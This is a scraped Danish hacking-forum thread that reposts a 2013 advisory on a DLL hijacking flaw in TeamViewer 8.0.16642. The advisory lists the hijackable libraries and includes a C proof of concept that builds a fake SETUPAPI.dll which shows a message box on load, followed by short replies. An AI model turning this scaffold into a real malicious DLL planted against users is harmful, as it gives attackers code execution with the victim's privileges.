Shellsec

Fuld version: TeamViwer V8.0.16642 Insecure Library Load
Du ser lige nu en skrabet udgave af vores indhold. Se den fulde version med ordentlig formatering.
Ville lige dele denne exploit herinde, da det jo kunne være nogen som ville lege lidt med den. :P



1. RÅDGIVENDE INFORMATION
-----------------------
Produkt: TeamViwer V8.0.16642 Insecure Library Load
Vendor URL: http://www.teamviewer.com/fr/index.aspx
Dato fundet: 2013/02/24
Offentliggjort den: 2013/02/24
  
2. CREDITS
----------
Denne sårbarhed blev opdaget og undersøgt af The Black Devils
# Youtube: www.youtube.com/user/Th3BlackDevils
# Facebook: www.facebook.com / DevilsDz
# Email: mr.k4rizma @ gmail.com
  
3. VERSIONER PÅVIRKET
--------------------
TeamViwer V8.0.16642, kan ældre versioner blive påvirket også.
  
  
4. SÅRBARHED BESKRIVELSE
----------------------------
En Insecure Library Load sårbarhed er blevet identificeret i
TeamViwer V8.0.16642.
  
Programmet bruger en fast sti for at lede efter bestemte filer eller
biblioteker. Denne sti indeholder mapper, der ikke kræver speciel tillid
eller under brugerkontrol.
  
Ved at placere en custom version af et bibliotek i program stien,
Programmet vil indlæse den før den legitime version. Dette giver en
hacker tilladelse til at inject brugerdefineret kode, der vil blive kørt med det
privilegium programmet eller brugeren kørslen af ​​programmet.
Følgende biblioteker kan blive kapret på denne måde:

LPK.dll
SETUPAPI.dll
SHFOLDER.dll
CLBCATQ.DLL
Secur32.dll


5. PROOF-OF-CONCEPT (Kode / Exploit)
------------------------------------
// wine gcc -Wall -shared inject.c -o SETUPAPI.dll
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpvReserved)
{
if (dwReason == DLL_PROCESS_ATTACH)
{
MessageBox(0,"Inj3ctor","The Black Devils", 0);
}
return TRUE;
}
Danish :)
Sorry morph :D, Skulle være nogenlunde dansk nu :P
Interesseret... Det gav mig lige en ide til noget jeg skal afprøve....
Godt du kunne bruge den spagnum :D
Ved godt denne tråd er en ældre en af slagsen, men DLL hijacking/preloading angreb lever stadig i bedste velgående.
Selv Acunetix har været sårbar(er højst sandsynligt patched). Og det er skam ikke udelukkende Windows der har problemet.